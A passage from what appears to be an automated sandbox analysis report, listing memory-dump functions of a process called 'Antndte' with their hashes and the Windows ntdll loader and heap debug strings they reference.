                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                • Opcode ID: a98d3d1a3edb5729cbad22e5a1d738806e0a875dd269b3774642904e5c463170
                                                                                                                                • Instruction ID: de4d76bce934026aefd5dcefefef15a0d5c86ee9d47fc6c33d3b7b951a1a0f4d
                                                                                                                                • Opcode Fuzzy Hash: a98d3d1a3edb5729cbad22e5a1d738806e0a875dd269b3774642904e5c463170
                                                                                                                                • Instruction Fuzzy Hash: 55319C76A10208FFDB01CB58DC89F9AB7B9EB457A0F1141A5E815AF3A1DB30ED40CE60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e~5
                                                                                                                                • API String ID: 0-100141299
                                                                                                                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                • Instruction ID: 9d206d7aac299be9322c4f9847a28e1da3f5c84be4603553b7d48212e86af776
                                                                                                                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                • Instruction Fuzzy Hash: ED314371A00659BFDB11CBD5CC44EDEBB79FB84750F104025E915AB260DB31DE459BA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: 180a7439075c8761d9a0e979645dc1bfbc8de759de77bb815e700adffcdfc3f4
                                                                                                                                • Instruction ID: db1ef58a36c6af5b6799528a255e0b40c86d99f3eadd77ed2effd391c1bbd642
                                                                                                                                • Opcode Fuzzy Hash: 180a7439075c8761d9a0e979645dc1bfbc8de759de77bb815e700adffcdfc3f4
                                                                                                                                • Instruction Fuzzy Hash: D151E175A04709EFEB05DF68C888BEDB7B6FF44355F10416AE4129B390EBB49A11CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                • Opcode ID: b4c39b8d061b2a4cdbf1e4fd007305e3fdbfcf43dc1fec71849360696b045ffd
                                                                                                                                • Instruction ID: a45016311a24e7932b3c4f043bd72b505806c6e6a30ac6886b8400452942396c
                                                                                                                                • Opcode Fuzzy Hash: b4c39b8d061b2a4cdbf1e4fd007305e3fdbfcf43dc1fec71849360696b045ffd
                                                                                                                                • Instruction Fuzzy Hash: 94F16CF5A0432C8BDB21CB18CC80B99B7B5BF44754F9480E9DA49A7240EB719EC5CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 358200C7
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 358200F1
                                                                                                                                • RTL: Re-Waiting, xrefs: 35820128
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: cb386331ee408c6ce5cb23449d9756ba0f2c2aeb31dd22c8b727531815ac05b9
                                                                                                                                • Instruction ID: 2633f74b320e37acd43ed15dd570c3cec98af903f45b882ab17e6f11f1c25fbb
                                                                                                                                • Opcode Fuzzy Hash: cb386331ee408c6ce5cb23449d9756ba0f2c2aeb31dd22c8b727531815ac05b9
                                                                                                                                • Instruction Fuzzy Hash: ABE1BD74608741DFE711CF28C894B0ABBE2BF84364F100A5DF5A58B2E1DB75E986CB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                • API String ID: 0-2391371766
                                                                                                                                • Opcode ID: 57aa59d6707f41eb8f3f4c4eafdfbc36610785ceb2ba5039adaa84de59f3d62d
                                                                                                                                • Instruction ID: 57de3f917564197e57b23a24555ac970da7a5efaf9390b3be4aa58aeb1963ebf
                                                                                                                                • Opcode Fuzzy Hash: 57aa59d6707f41eb8f3f4c4eafdfbc36610785ceb2ba5039adaa84de59f3d62d
                                                                                                                                • Instruction Fuzzy Hash: 7CB1BD7960A345AFE312CF55D886B5BB3E8BB44750F444929FA509B290DFB1EC08CBD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3580E455
                                                                                                                                • HEAP[%wZ]: , xrefs: 3580E435
                                                                                                                                • HEAP: , xrefs: 3580E442
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • LdrpCompleteMapModule, xrefs: 3581A39D
                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3581A3A7
                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3581A396
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • HEAP[%wZ]: , xrefs: 3585D792
                                                                                                                                • HEAP: , xrefs: 3585D79F
                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3585D7B2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35821943
                                                                                                                                • LdrpAllocateTls, xrefs: 3582194A
                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 35821954
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 357BA229
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 357BA21B
                                                                                                                                • @Sx5, xrefs: 357BA268
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @Sx5$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                • API String ID: 0-1027603848
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • LdrpInitializeTls, xrefs: 35821851
                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 3582184A
                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 3582185B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                • API String ID: 0-931879808
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 358385DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@
                                                                                                                                • API String ID: 0-149943524
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: e48e289ea4c0a624d914dd197acc717bb284a9e0a791a921902b1ef3e2e2da14
                                                                                                                                • Instruction ID: e22eceb75e083079eb38cfc1b80ef754dbf66989aef198a588b418dc1e073d1e
                                                                                                                                • Opcode Fuzzy Hash: e48e289ea4c0a624d914dd197acc717bb284a9e0a791a921902b1ef3e2e2da14
                                                                                                                                • Instruction Fuzzy Hash: B4318D35301B06EBEB55DF65C984E9AF7B6BF44B98F004155E9018BA50EBB0ED21CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • RedirectedKey, xrefs: 3588B60E
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3588B5C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                • Opcode ID: deaa9f61d3584cafa6bbd4dd24e9255765d611be18c32f7f69fff990998f63d7
                                                                                                                                • Instruction ID: b04fe0c44d2e8300b7f6fdfd6b7497d26f37f92861ec50e74378431c30d7b84a
                                                                                                                                • Opcode Fuzzy Hash: deaa9f61d3584cafa6bbd4dd24e9255765d611be18c32f7f69fff990998f63d7
                                                                                                                                • Instruction Fuzzy Hash: 2B6116B5D00229EFDB11DF94D888ADEBFB9FB48701F50406AE415E7200DB359A45CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$$
                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                • Opcode ID: 4eff8d9d3faac86037fcf3bbfaec62203ac9225d9fb848f0541633f170bba785
                                                                                                                                • Instruction ID: a98880d1ab188c41c8c72bd1a3dfe8fc3ba1149b748af334abfc6adc743a0239
                                                                                                                                • Opcode Fuzzy Hash: 4eff8d9d3faac86037fcf3bbfaec62203ac9225d9fb848f0541633f170bba785
                                                                                                                                • Instruction Fuzzy Hash: DB618A75A01B49CFEB20CFA4C588B9DB7F2FB44704F5044AAD515AF694CB74A982CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                • API String ID: 0-118005554
                                                                                                                                • Opcode ID: 547a14b377eaf5a18f3f0a70d78d70d0967b9b661a708611a8beb4ddb06ff08f
                                                                                                                                • Instruction ID: 47a31c2025b49107db47d1aeb8e29be42f91fe035dff7dc7489b4ef9473ef0ed
                                                                                                                                • Opcode Fuzzy Hash: 547a14b377eaf5a18f3f0a70d78d70d0967b9b661a708611a8beb4ddb06ff08f
                                                                                                                                • Instruction Fuzzy Hash: 6331EBB52087559BE311CB68D884B2AB7E8FF84750F9008A9FC658B390EF31DD45CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: z5$ z5
                                                                                                                                • API String ID: 0-83763479
                                                                                                                                • Opcode ID: 56e71b5a8d0011faef874e2c47448d71498f1bee2c33683e91dfbde45b4664fd
                                                                                                                                • Instruction ID: 091c4e3bb69b688b5454bed9a7a6b7deaa4003b3a09be634e1198a9882d5f1ef
                                                                                                                                • Opcode Fuzzy Hash: 56e71b5a8d0011faef874e2c47448d71498f1bee2c33683e91dfbde45b4664fd
                                                                                                                                • Instruction Fuzzy Hash: 1B31B176B08711AFDF12DE248898E5BB7A6AF846A0F014569FC159F310EB70DC058FA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local\$@
                                                                                                                                • API String ID: 0-380025441
                                                                                                                                • Opcode ID: 27b5631568585d3f4e43d6e8d110c56c96eb855173ec34e0baffcc6394d3d109
                                                                                                                                • Instruction ID: 23aab636229c90bcae2bc2728ebfb7c539a25e6202066b74481bd24d6957a140
                                                                                                                                • Opcode Fuzzy Hash: 27b5631568585d3f4e43d6e8d110c56c96eb855173ec34e0baffcc6394d3d109
                                                                                                                                • Instruction Fuzzy Hash: A0316EB5509305AFD311CF28C884E5BBBE9FB85754F40192EF9958B250DB35ED088B92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3582289F
                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3582289A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                • Opcode ID: 30b78b844841da7e3bac7f0eb08112ffaa06372eaf859030af7b04936948bda3
                                                                                                                                • Instruction ID: 6e2aaf93f22b47d2486d8ec4a3fd152fec3514689734b96082266c91a266649c
                                                                                                                                • Opcode Fuzzy Hash: 30b78b844841da7e3bac7f0eb08112ffaa06372eaf859030af7b04936948bda3
                                                                                                                                • Instruction Fuzzy Hash: 1F112576B04308BFE7198A48CC42FAF7AE9EB85754F618069B905EF244DAB4DD0086A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                • Opcode ID: 6fa2b0f6d1b6396c54cf15472349029a3d7da37697e192217e88c29dcbe4f972
                                                                                                                                • Instruction ID: 2d9496d5db2fc44ed5e8eb8fc5a167b8db20c04f8c1f3db8d89894da7e48bef5
                                                                                                                                • Opcode Fuzzy Hash: 6fa2b0f6d1b6396c54cf15472349029a3d7da37697e192217e88c29dcbe4f972
                                                                                                                                • Instruction Fuzzy Hash: C401DCB2614700AFE311CF24CE09B1277F8EB80715F0189BAAA58CB590EB34E905CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                • Opcode ID: ab6b1d3f29fc4d16fc6b1498d5bdfbf648e15118899d601d39acd242102f3d0e
                                                                                                                                • Instruction ID: 70a9f77755aba6d33326d52a913626b440b349c14f9471ae5fd812eb4aae8ad0
                                                                                                                                • Opcode Fuzzy Hash: ab6b1d3f29fc4d16fc6b1498d5bdfbf648e15118899d601d39acd242102f3d0e
                                                                                                                                • Instruction Fuzzy Hash: 9C8259B9E043199FEF14CFA9C880BDDB7B6BF48350F51816AE859AF250DBB09941CB50
                                                                                                                                Uniqueness

